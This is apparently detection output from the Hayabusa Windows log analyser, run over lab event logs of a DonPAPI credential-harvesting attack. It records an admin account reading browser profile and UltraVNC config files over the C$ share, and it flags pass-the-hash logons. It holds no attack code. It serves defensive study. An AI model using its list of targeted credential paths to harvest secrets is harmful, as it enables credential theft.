2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
